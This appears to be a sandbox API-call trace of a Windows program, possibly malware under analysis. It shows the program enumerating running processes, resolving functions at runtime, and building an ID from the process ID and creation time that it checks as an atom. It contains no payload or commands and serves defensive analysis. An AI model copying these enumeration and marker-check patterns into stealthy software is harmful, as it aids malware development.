	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0070.872] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.872] CloseHandle (hObject=0x224) returned 1
	[0070.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0070.872] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.872] CloseHandle (hObject=0x224) returned 1
	[0070.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0070.872] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.872] CloseHandle (hObject=0x224) returned 1
	[0070.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0070.872] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.872] CloseHandle (hObject=0x224) returned 1
	[0070.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0070.872] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.872] CloseHandle (hObject=0x224) returned 1
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0070.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.873] CloseHandle (hObject=0x224) returned 1
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0070.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.873] CloseHandle (hObject=0x224) returned 1
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0070.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.873] CloseHandle (hObject=0x224) returned 1
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0070.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.873] CloseHandle (hObject=0x224) returned 1
	[0070.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0070.874] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.874] CloseHandle (hObject=0x224) returned 1
	[0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0070.874] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.874] CloseHandle (hObject=0x224) returned 1
	[0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0070.874] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.874] CloseHandle (hObject=0x224) returned 1
	[0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0070.874] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.874] CloseHandle (hObject=0x224) returned 1
	[0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0070.874] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.874] CloseHandle (hObject=0x224) returned 1
	[0070.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0070.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.875] CloseHandle (hObject=0x224) returned 1
	[0070.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0070.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.875] CloseHandle (hObject=0x224) returned 1
	[0070.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0070.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.875] CloseHandle (hObject=0x224) returned 1
	[0070.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0070.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.875] CloseHandle (hObject=0x224) returned 1
	[0070.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0070.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.875] CloseHandle (hObject=0x224) returned 1
	[0070.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.876] CloseHandle (hObject=0x224) returned 1
	[0070.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.876] CloseHandle (hObject=0x224) returned 1
	[0070.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.876] CloseHandle (hObject=0x224) returned 1
	[0070.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.876] CloseHandle (hObject=0x224) returned 1
	[0070.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a58, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.876] CloseHandle (hObject=0x224) returned 1
	[0070.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0070.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.877] CloseHandle (hObject=0x224) returned 1
	[0070.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e888, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.877] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.877] CloseHandle (hObject=0x224) returned 1
	[0070.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.877] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.878] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.878] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.878] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.879] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetLastError () returned 0x5
	[0070.880] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.880] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.880] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.881] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.881] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0070.881] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.881] CloseHandle (hObject=0x224) returned 1
	[0070.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0070.881] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.881] CloseHandle (hObject=0x224) returned 1
	[0070.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16a98) returned 0xc0000004
	[0070.917] VirtualAlloc (lpAddress=0x0, dwSize=0x16b98, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16b98, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
